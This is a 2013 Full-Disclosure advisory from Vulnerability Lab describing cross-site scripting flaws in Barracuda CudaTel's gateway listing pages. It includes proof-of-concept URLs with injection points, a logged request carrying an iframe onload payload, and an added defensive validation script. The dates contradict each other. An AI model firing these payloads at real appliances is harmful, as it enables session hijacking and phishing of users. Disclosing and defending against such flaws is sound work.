List:       full-disclosure
Subject:    [Full-disclosure] Barracuda CudaTel 2.6.02.04 - Multiple Web Vulnerabilities
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2013-06-27 23:50:26
Message-ID: 51CCCFC2.3000207 () vulnerability-lab ! com

Title:
======
Barracuda CudaTel 2.6.02.04 - Multiple Web Vulnerabilities


Date:
=====
2013-06-25


References:
===========
http://vulnerability-lab.com/get_content.php?id=778

BARRACUDA NETWORK SECURITY ID: BNSEC-811


VL-ID:
=====
778


Common Vulnerability Scoring System:
====================================
2.5


Introduction:
=============
Designed to enable seamless voice and video communication, the CudaTel Communication Server is
an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication
Server's enterprise-class feature set includes Voice over IP (VoIP) PBX services,
conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use
Web interface. CudaTel Communication Server is compatible with any SIP device and provider,
and can be pre-configured for use with both analog and digital telephone networks. Powerful,
Complete Solution With an expansive feature set and no per user or phone licensing fees,
the CudaTel Communication Server is equipped and priced for organizations of any size. Native
High Definition audio support and integrated phone line (TDM) hardware produce an
unparalleled audio experience. VOIP encryption protects calls from hackers and digital
eavesdroppers.

(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple client side vulnerabilities in \
the Barracuda Networks CudaTel v2.6.002.040 appliance application.


Report-Timeline:
================
2012-11-27:	Researcher Notification & Coordination (Benjamin Kunz Mejri)
2012-11-28:	Vendor Notification (Barracuda Networks Security - Bug Bounty Program)
2012-12-01:	Vendor Response/Feedback (Barracuda Networks Security - Bug Bounty Program)
2013-03-14:	Vendor Fix/Patch (Barracuda Networks Developer) [Coordination: Dave Farrow]
2012-06-25:	Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
Multiple client-side input validation vulnerabilities were detected in the Barracuda Networks
CudaTel v2.6.002.040 appliance application. The non-persistent vulnerabilities allow a
remote attacker to manipulate client-side application-to-browser requests.

The client-side vulnerability is located in the siplist and list modules, in the processing of
requests for the listing with manipulated bbx_provider_gateway_name, bbx_provider_gateway_username
or bbx_provider_gateway_host parameters.

Exploitation of the vulnerability requires medium application user interaction. Successful
exploitation of the vulnerability results in client-side phishing, client-side session
hijacking, client-side external redirects to malware or evil websites, and client-side module
context manipulation (cache).


Vulnerable Module(s):
				[+] siplist - Listing
				[+] list - Listing

Vulnerable Parameter(s):
				[+] bbx_provider_gateway_name
				[+] bbx_provider_gateway_username
				[+] bbx_provider_gateway_host


Proof of Concept:
=================
The client-side input validation vulnerabilities can be exploited by remote attackers without
an application user account and with medium or high user interaction. For
demonstration or reproduce ...

Path: 
gui/gateway/siplist
gui/gateway/list


Parameter: 
undefined, bbx_provider, rows, page & searchstring

Values: 
bbx_provider_gateway_name,  bbx_provider_gateway_username & bbx_provider_gateway_host

Review: List

<pre>--- 
count: 1
list: 
  - 
    
bbx_domain_id: 6
bbx_extension_block_begin: 2008
bbx_extension_block_end: 2008
bbx_extension_id: 26
bbx_extension_id_primary: 26
bbx_extension_rcd: 2012-11-26 15:58:45.413912
bbx_extension_rpd: 2012-11-26 15:58:45.413912
bbx_extension_value: 2008
bbx_queue_id: 12
flag_auto_provision: 0
flag_external: 0
flag_locked: 0
flag_primary: 1
flag_standalone: 1
flag_super: 0
flag_voicemail: 0
show_name: "\"><[PERSISTENT INJECTED SCRIPT CODE!]>"
sort_name: "\"><[PERSISTENT INJECTED SCRIPT CODE!]>"
type: queue
page: 1
rows: 25
</pre>



Review: SipList

<pre>--- 
count: 4

page: 1
rows: 30

siplist: 
  - 
    
bbx_provider_gateway_flag_inbound: 1
bbx_provider_gateway_flag_outbound: 1
bbx_provider_gateway_host: "\">/\"/'\"<[PERSISTENT INJECTED SCRIPT CODE!]>"
bbx_provider_gateway_id: 22
bbx_provider_gateway_name: "\"><[PERSISTENT INJECTED SCRIPT CODE!]>"
bbx_provider_gateway_port: 5060
bbx_provider_gateway_state: REFRESH
bbx_provider_gateway_username: "\">/\"/'\"<[PERSISTENT INJECTED SCRIPT CODE!]>"
bbx_provider_name: Generic SIP
  - 
bbx_provider_gateway_flag_inbound: 1
bbx_provider_gateway_flag_outbound: 1
bbx_provider_gateway_host: <[PERSISTENT INJECTED SCRIPT CODE!]")< 
bbx_provider_gateway_id:="" 23="" 
bbx_provider_gateway_name:="" <[PERSISTENT INJECTED SCRIPT CODE!];)" 
<="" <iframe="">%20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <
bbx_provider_gateway_port: <[PERSISTENT INJECTED SCRIPT CODE!]")<
bbx_provider_gateway_state: NOREG
bbx_provider_gateway_username: <[PERSISTENT INJECTED SCRIPT CODE!]")<
bbx_provider_name: PSTN Gateway
  - 
bbx_provider_gateway_flag_inbound: 1
bbx_provider_gateway_flag_outbound: 1
bbx_provider_gateway_host: "\"<h1>test</h1>"
bbx_provider_gateway_id: 21
bbx_provider_gateway_name: \\"<[PERSISTENT INJECTED SCRIPT CODE!]>
bbx_provider_gateway_port: 5060
bbx_provider_gateway_state: ~
bbx_provider_gateway_username: "\"<[PERSISTENT INJECTED SCRIPT CODE!]>"
bbx_provider_name: Generic SIP
  - 
bbx_provider_gateway_flag_inbound: 1
bbx_provider_gateway_flag_outbound: 1
bbx_provider_gateway_host: test.com
bbx_provider_gateway_id: 20
bbx_provider_gateway_name: test
bbx_provider_gateway_port: 5060
bbx_provider_gateway_state: NOREG
bbx_provider_gateway_username: test
bbx_provider_name: Generic SIP
</pre></body></html></iframe></[PERSISTENT INJECTED SCRIPT CODE!]")<></iframesrc=a></pre>


PoC:

http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?
_=1354065786075&undefined=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT \
CODE!]%20%3C&rows=10&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=


http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?
_=1354065786075&undefined=&rows=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT \
CODE!]%20%3C&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=


http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?
_=1354065786075&undefined=&rows=10&page=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT \
CODE!]%20%3C&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=


http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?
_=1354065786075&undefined=&rows=10&page=1&sortby=bbx_provider_gateway_name=%3C[PERSISTENT \
INJECTED SCRIPT CODE!]&sortorder=asc&searchstring=


http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?
_=1354065786075&undefined=&rows=10&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=%3C[PERSISTENT \
INJECTED SCRIPT CODE!]

http://cudatel.ptest.cudasvc.com/gui/gateway/list?
_=1354065786075&undefined=%3E%22%3C%3C[PERSISTENT INJECTED SCRIPT \
CODE!]%20%3C&rows=10&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=


http://cudatel.ptest.cudasvc.com/gui/gateway/list?
_=1354065786075&undefined=&rows=10&page=1&sortby=bbx_provider_gateway_name=[PERSISTENT INJECTED \
SCRIPT CODE!]%20%3C&sortorder=asc&searchstring=


ALL:
cudatel.ptest.cudasvc.com/gui/gateway/siplist?_=1354065786075&undefined=<[PERSISTENT INJECTED \
SCRIPT CODE!]<&rows= <[PERSISTENT INJECTED SCRIPT CODE!]<&page=<[PERSISTENT INJECTED SCRIPT \
CODE!]<&sortby=bbx_provider_gateway_name=<[PERSISTENT INJECTED SCRIPT CODE!]<

cudatel.ptest.cudasvc.com/gui/gateway/list?_=1354065786075&undefined=<[PERSISTENT INJECTED \
SCRIPT CODE!]<&rows= <[PERSISTENT INJECTED SCRIPT CODE!]<&page=<[PERSISTENT INJECTED SCRIPT \
CODE!]<&sortby=bbx_provider_gateway_name=<[PERSISTENT INJECTED SCRIPT CODE!]<


Request(s):

2:30:07.550[851ms][total 9418ms] Status: 200[OK]
GET http://cudatel.ptest.cudasvc.com/gui/gateway/siplist?_=1354065786075&undefined=%3Ciframe%20src=a%3E
 %20%20%20%20%22%3E%3Ciframe%20src=a%20onload=alert(%22VL%22)%20%3C&rows=%3Ciframe%20src=a%3E%20%20%20%20%22%3E%3Ciframe%20src=
 a%20onload=alert(%22VL%22)%20%3C
&page=%3Ciframe%20src=a%3E%20%20%20%20%22%3E%3Ciframe%20src=a%20onload=alert(%22VL%22)%20%3C&sortby=bbx_provider_gateway_name=
 %3Ciframe%20src=a%3E%20%20%20%20
%22%3E%3Ciframe%20src=a%20onload=alert(%22VL%22)%20%3C&sortorder=asc&searchstring=%3Ciframe%20src=a%3E%20%20%20%20%22%3E%3Ciframe
 %20src=a%20onload=alert(%22VL
%22)%20%3C Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[1833] Mime Type[text/html]
   Request Header:
      Host[cudatel.ptest.cudasvc.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      DNT[1]
      Connection[keep-alive]
      Cookie[cookietest=1; bps_session=86bd13e59f90e0f8670a547c0d0ce57e710393d6]
   Response Header:
      Date[Wed, 28 Nov 2012 01:30:08 GMT]
      Server[BarracudaHTTP 2.0/2.2.10 (Unix) mod_auth_pgsql/2.0.3 mod_fastcgi/mod_fastcgi-SNAP-0811090952 mod_ssl/2.2.10 OpenSSL/0.9.8x mod_perl/2.0.2 Perl/v5.8.8]
      Vary[Content-Type]
      Set-Cookie[bps_session=86bd13e59f90e0f8670a547c0d0ce57e710393d6; path=/]
      Content-Length[1833]
      Cache-Control[must-revalidate]
      Expires[Thu, 28 Nov 2013 01:30:08 GMT]
      Keep-Alive[timeout=5, max=100]
      Connection[Keep-Alive]
      Content-Type[text/html]


Reference(s):
cudatel.ptest.cudasvc.com/gui/gateway/siplist
cudatel.ptest.cudasvc.com/gui/gateway/list


Solution:
=========
2013-03-14:	Vendor Fix/Patch (Barracuda Networks Developer) [Coordination: Dave Farrow]

Note: The upgrade is available to all customers of the appliance module and can be done
automatically or manually in the customer center of Barracuda Networks.
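
Added example (not part of the original advisory and not the vendor's patch): a strict
server-side check for the listing parameters named above, plus output encoding for stored
gateway fields. The allowed sort columns, the rules per parameter, the host pbx.example.test
and the sample URLs are assumptions made for illustration.

```python
import html
from urllib.parse import urlsplit, parse_qsl

# Paths and parameter names come from the advisory; the rules are assumptions.
LISTING_PATHS = ("/gui/gateway/siplist", "/gui/gateway/list")
SORT_COLUMNS = {"bbx_provider_gateway_name", "bbx_provider_gateway_username",
                "bbx_provider_gateway_host"}
MARKUP_CHARS = set("<>\"'")

# Constructed sample requests (harmless markers instead of script code).
CLEAN = ("http://pbx.example.test/gui/gateway/siplist?_=1354065786075&undefined="
         "&rows=10&page=1&sortby=bbx_provider_gateway_name&sortorder=asc&searchstring=")
TAMPERED = ("http://pbx.example.test/gui/gateway/list?_=1&undefined=&rows=%3Cb%3E"
            "&page=1&sortby=bbx_provider_gateway_name=%3Cb%3E&sortorder=asc"
            "&searchstring=%22%3E")

def check_param(name, value):
    """Return a reason string if the value is unacceptable, else None."""
    if name in ("rows", "page", "_"):
        return None if value.isdigit() else "not numeric"
    if name == "sortby":
        return None if value in SORT_COLUMNS else "not an allowed column"
    if name == "sortorder":
        return None if value in ("asc", "desc") else "not asc/desc"
    # Free-text parameters (searchstring, undefined, anything unknown).
    if MARKUP_CHARS & set(value):
        return "contains markup characters"
    return None

def audit_request(url):
    """Return {parameter: reason} for a listing request, {} if it is clean."""
    parts = urlsplit(url)
    if not parts.path.endswith(LISTING_PATHS):
        return {}
    findings = {}
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        reason = check_param(name, value)
        if reason:
            findings[name] = reason
    return findings

def render_cell(value):
    """Encode a stored gateway field before it is written into HTML."""
    return html.escape(value, quote=True)

if __name__ == "__main__":
    for url in (CLEAN, TAMPERED):
        print(audit_request(url))
```

The same audit_request() check can be run over the request URLs in web server access logs
to find listing requests that carry markup in rows, page, sortby or searchstring.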


Risk:
=====
The security risk of the (multiple) client-side input validation vulnerabilities in the siplist
and list modules is estimated as medium.


Credits:
========
Vulnerability Laboratory [Research Team]  -    Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability-Lab disclaims all warranties,  either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business  profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some  states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation  may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases  or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - \
                www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - \
                research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - \
                news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - \
                youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - \
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory.  Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other  media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and  other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed),  modify, use \
or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to \
get a permission.

    				   	Copyright © 2013 | Vulnerability Laboratory



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

